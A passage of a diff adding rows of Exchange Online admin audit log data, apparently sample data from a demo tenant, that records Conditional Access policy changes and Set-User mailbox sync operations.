+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:39:05.0146113Z""
+  }
+]"
+2020-05-19T14:25:01Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:18566,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 2:25:00 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:39:05.0146113Z""
+  }
+]"
+2020-05-19T15:10:58Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\f7ed24a4-8fab-4f94-a97f-533604a3453a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-19T16:46:51Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-19T16:46:51Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-19T18:22:54Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-19T20:52:31Z,NT AUTHORITY\SYSTEM (Microsoft.Exchange.Management.ForwardSync),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-19T21:12:45Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\f7ed24a4-8fab-4f94-a97f-533604a3453a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-19T21:07:12Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\009194cf-7935-420a-9f05-1782af9ada42""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-19T22:48:50Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-19T22:48:50Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-20T00:23:54Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-20T02:18:30Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/20/2020 2:18:30 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-20T02:18:28Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/20/2020 2:18:28 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-20T02:18:31Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\3b13ea3c-c733-4eb8-bd19-67d308b2ea04""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""CreatedDateTime\"":\""2020-05-19T13:34:15.2394934Z\"",\""ModifiedDateTime\"":\""2020-05-19T13:39:04.7333386Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""None\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""Guests\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\"",\""RequireCompliantDevice\""]}]}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/20/2020 2:18:30 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Yanivsh -CA Test""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-20T02:18:29Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/20/2020 2:18:29 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""5/19/2020 1:39:05 PM""
+  }
+]"
+2020-05-20T02:18:27Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/20/2020 2:18:27 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-20T02:18:30Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/20/2020 2:18:30 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-20T02:18:29Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/20/2020 2:18:29 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-20T02:18:29Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/20/2020 2:18:29 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-20T02:18:29Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/20/2020 2:18:28 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-20T02:18:28Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/20/2020 2:18:27 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-20T02:18:27Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/20/2020 2:18:26 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-20T02:18:31Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/20/2020 2:18:31 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-05-20T02:18:30Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/20/2020 2:18:29 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-20T02:18:28Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/20/2020 2:18:28 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-20T03:08:18Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\009194cf-7935-420a-9f05-1782af9ada42""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-20T02:37:38Z,NT AUTHORITY\SYSTEM (MSExchangeMigrationWorkflow),,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\f7ed24a4-8fab-4f94-a97f-533604a3453a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-20T05:12:58Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\3b13ea3c-c733-4eb8-bd19-67d308b2ea04""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""CreatedDateTime\"":\""2020-05-19T13:34:15.2394934Z\"",\""ModifiedDateTime\"":\""2020-05-19T13:39:04.7333386Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""None\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""Guests\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\"",\""RequireCompliantDevice\""]}]}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/20/2020 5:12:57 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Yanivsh -CA Test""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-20T05:12:57Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/20/2020 5:12:57 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-20T05:12:56Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/20/2020 5:12:56 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-20T05:12:57Z,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
